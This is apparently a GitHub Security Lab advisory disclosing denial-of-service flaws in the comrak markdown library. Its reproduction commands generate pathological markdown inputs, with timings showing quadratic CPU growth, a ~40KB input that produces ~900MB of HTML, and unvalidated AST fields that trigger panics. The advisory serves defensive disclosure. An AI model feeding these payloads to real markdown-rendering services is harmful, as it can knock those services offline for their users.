GHSL-2023-047_GHSL-2023-049: Denial of Service (DoS) in comrak - CVE-2023-28626, CVE-2023-28631

Coordinated Disclosure Timeline

2023-03-22: Issues reported to maintainer and acknowledged
2023-03-23: Patches proposed by maintainer
2023-03-27: Fixes merged

Summary

A number of quadratic parsing issues can allow an attacker to trigger a denial-of-service via excessive CPU usage or excessive memory usage.

In addition, an architectural design decision in the AST module could allow attackers to trigger a denial-of-service in applications building ASTs programmatically.

Product

comrak

Tested Version

Details

Issue 1: Quadratic runtime when parsing markdown (`GHSL-2023-047`)

There are a number of parsing issues in comrak where the runtime increases quadratically compared to the input size. This can allow an attacker to trigger excessive CPU usage and cause a denial of service. comrak is heavily based on the github/cmark-gfm project, so a number of quadratic parsing issues are similar to upstream cmark or cmark-gfm issues.

In our research we looked at previously submitted bug reports to cmark or cmark-gfm, the cmark-gfm suite of regression tests, and a custom fuzzer we created for comrak.

Known `cmark` or `cmark-gfm` vulnerabilities

The cmark issue, “Pathological input: Deeply nested lists”, can be reproduced in comrak:

$ for n in $(echo 100 200 400 800 1600); do echo -n "${n}: "; ./a.out "${n}" | time ./target/release/comrak --extension table >/dev/null; done
        0.07 real         0.04 user         0.00 sys
        0.15 real         0.13 user         0.00 sys
        0.63 real         0.60 user         0.01 sys
        3.77 real         3.72 user         0.03 sys
       27.64 real        27.32 user         0.14 sys

A number of other cmark or cmark-gfm quadratic parsing issues affect comrak too.

Quadratic behavior when parsing emphasis

$ for n in 5000 10000 20000 40000 80000; do echo -n "${n} "; python3 -c "print('*t '*$n+'_t*_ '*$n)" |time ./target/release/comrak >/dev/null; done
       0.08 real         0.05 user         0.00 sys
       0.16 real         0.14 user         0.00 sys
       0.51 real         0.48 user         0.01 sys
       1.95 real         1.89 user         0.02 sys
       8.30 real         8.13 user         0.07 sys

Quadratic behavior when parsing inlines

$ for n in $(echo 5000 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('- '*${n}+'s'+' -'*${n})" | time ./target/release/comrak --smart >/dev/null; done
        0.60 real         0.47 user         0.11 sys
        2.00 real         1.75 user         0.21 sys
        7.54 real         7.01 user         0.43 sys
       31.65 real        30.37 user         0.94 sys

Quadratic behaviour on pathological html

$ for n in $(echo 5000 10000 20000); do echo -n "${n}: "; python3 -c "print('a <\x21[CDATA[' * ${n})" | time ./target/release/comrak >/dev/null; done
        2.24 real         2.17 user         0.01 sys
        8.54 real         8.40 user         0.03 sys
       36.56 real        35.82 user         0.16 sys

Quadratic behavior when parsing smart quotes

$ for n in $(echo 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"'\"*$n)" |time ./target/release/comrak --smart >/dev/null; done
        0.06 real         0.04 user         0.00 sys
        0.12 real         0.10 user         0.00 sys
        0.46 real         0.44 user         0.00 sys
        1.85 real         1.82 user         0.00 sys
        7.34 real         7.24 user         0.03 sys
160000:        31.24 real        30.91 user         0.12 sys

Parsing ‘* * * * * * … a’ takes quadratic time

$ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('* '*${n} + 'a')" | time ./target/release/comrak >/dev/null; done
        1.26 real         1.02 user         0.21 sys
        4.50 real         3.99 user         0.42 sys
       19.08 real        17.97 user         0.89 sys

Pathological input: Unclosed inline links (another)

$ for n in $(echo 5000 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[a](<b' * ${n})" | time ./target/release/comrak >/dev/null; done
        0.62 real         0.59 user         0.00 sys
        2.31 real         2.25 user         0.01 sys
        8.95 real         8.81 user         0.04 sys
       35.96 real        35.42 user         0.13 sys

blocks: Fix quadratic behavior in finalize

$ for n in $(echo 5000 10000 20000 40000 80000); do echo -n "${n}: "; python3 -c "print('[a]: u\n' * ${n})" | time ./target/release/comrak >/dev/null; done
        0.14 real         0.12 user         0.00 sys
        0.38 real         0.37 user         0.00 sys
        1.41 real         1.38 user         0.00 sys
        5.52 real         5.46 user         0.01 sys
       24.90 real        24.47 user         0.10 sys

`cmark-gfm` regression tests

In addition, there are two testcases from the cmark-gfm testsuite which trigger quadratic parsing behaviour:

pattern [ (]( repeated

$ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[ (](' * ${n})" | time ./target/release/comrak >/dev/null; done
        1.37 real         1.34 user         0.00 sys
        5.13 real         5.10 user         0.01 sys
       21.00 real        20.91 user         0.03 sys

unclosed links A

$ for n in $(echo 10000 20000 40000); do echo -n "${n}: "; python3 -c "print('[a](<b' * ${n})" | time ./target/release/comrak >/dev/null; done
        2.27 real         2.21 user         0.01 sys
        8.89 real         8.77 user         0.04 sys
       36.77 real        36.18 user         0.16 sys

Fuzz testing

The following testcases show a number of quadratic parsing issues we discovered via fuzzing that appear to be specific to comrak:

"\n|-\n^\" * N

$ for n in $(echo 250 500 1000 2000 4000); do echo -n "${n}: "; python3 -c "print(\"\n|-\n^\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
        0.14 real         0.12 user         0.00 sys
        0.52 real         0.50 user         0.01 sys
        2.73 real         2.70 user         0.01 sys
       17.05 real        16.99 user         0.04 sys
      125.65 real       125.11 user         0.22 sys

" |A\n---: |\n| A | A" * N

$ for n in $(echo 250 500 1000 2000 4000); do echo -n "${n}: "; python3 -c "print(\"      |A\n---: |\n| A   | A\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
        0.21 real         0.19 user         0.00 sys
        0.96 real         0.93 user         0.01 sys
        5.78 real         5.72 user         0.03 sys
       40.92 real        40.63 user         0.16 sys
^Ctime: command terminated abnormally
26 real       208.68 user         0.74 sys

"<b" * N

$ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"<b\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
        0.13 real         0.07 user         0.04 sys
        0.28 real         0.18 user         0.08 sys
        0.80 real         0.61 user         0.17 sys
        2.66 real         2.30 user         0.33 sys
        9.97 real         9.20 user         0.72 sys
       38.00 real        36.28 user         1.55 sys
160000:       147.16 real       143.76 user         2.95 sys

"[](" * N

$ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"[](\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
        0.14 real         0.06 user         0.06 sys
        0.26 real         0.12 user         0.12 sys
        0.65 real         0.36 user         0.26 sys
        1.78 real         1.24 user         0.50 sys
        5.88 real         4.78 user         1.01 sys
       21.10 real        18.69 user         2.14 sys
160000:        80.39 real        74.52 user         4.94 sys

"r@o.c" * N

$ for n in $(echo 2500 5000 10000 20000 40000 80000 160000); do echo -n "${n}: "; python3 -c "print(\"r@o.c\"*$n)" | time ./target/release/comrak --gfm >/dev/null; done
        0.21 real         0.07 user         0.12 sys
        0.36 real         0.13 user         0.21 sys
        0.81 real         0.34 user         0.44 sys
        2.03 real         1.16 user         0.83 sys
        5.94 real         4.16 user         1.66 sys
       19.59 real        15.93 user         3.43 sys
160000:        73.22 real        65.63 user         7.08 sys

Issue 2: Excessive output when parsing markdown (`GHSL-2023-048`)

comrak is vulnerable to the upstream cmark issue, “Issue revealed by fuzzer”. A large number of references in a markdown document can trigger an overly large response. For example, this markdown ~40KB document generates a ~900MB HTML output:

$ python3 -c 'print("[1] "*5000,"\n\n[1]: urn:","\x00"*20000,"\n", sep="")' | wc -c
   40013
$ python3 -c 'print("[1] "*5000,"\n\n[1]: urn:","\x00"*20000,"\n", sep="")' | ./target/release/comrak |wc -c
 900105007

This issue could trigger a denial-of-service be triggering excessive memory usage or generating an overly large output.

Issue 3: Attacker controlled data in AST nodes is not validated (`GHSL-2023-049`)

A comrak AST can be constructed manually by a program instead of parsing a markdown document with parse_document. This AST can then be converted to HTML via html::format_document_with_plugins. However, the HTML formatting code assumes that the AST is well-formed. For example, many AST notes contain [u8] fields which the formatting code assumes is valid UTF-8 data. Several bugs can be triggered if this is not the case. For example:

The literal member of NodeHtmlBlock is not validated when formatting an AST to HTML. The literal value is processed by the tagfilter function which uses the unsafe String::from_utf8_unchecked). If the value is attacker controlled then it can cause an out of bounds read (up to two bytes if literal ends with 0xe2).
The literal member of NodeHtmlBlock is not validated when formatting an AST to HTML. The literal value is processed by the tagfilter function which assumes that it contains well-formed HTML. If literal contains a truncated HTML tag (e.g. <title) then a panic can be triggered which crashes the program when indexing literal[j].
The FootnoteReference structure is not validated when formatting an AST to HTML. The byte buffer is assumed to be UTF-8 encoded in format_node. The unwrap() call will panic if this is not the case.
The info member of NodeCodeBlock is not validated when formatting an AST to HTML. The byte buffer is assumed to be UTF-8 encoded in format_node. The unwrap() call will panic if this is not the case.

Depending on how the comrak library is used by applications, this could allow attackers to trigger an assertion failure causing a denial-of-service if input is not correctly sanitized.

CVE

CVE-2023-28626 - GHSL-2023-047
CVE-2023-28631 - GHSL-2023-049

Credit

GHSL-2023-047 and GHSL-2023-048 were discovered and reported by GHSL team member @philipturnbull (Phil Turnbull).

GHSL-2023-049 was discovered and reported by GHSL team member @darakian (Jonathan Moroney).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-047, GHSL-2023-048, or GHSL-2023-049 in any communication regarding these issues.